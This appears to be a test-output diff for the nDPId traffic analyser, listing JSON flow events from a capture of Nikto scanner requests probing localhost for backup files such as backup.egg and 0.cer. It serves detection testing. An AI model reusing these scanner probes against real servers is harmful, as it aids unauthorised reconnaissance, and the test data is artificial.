{"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 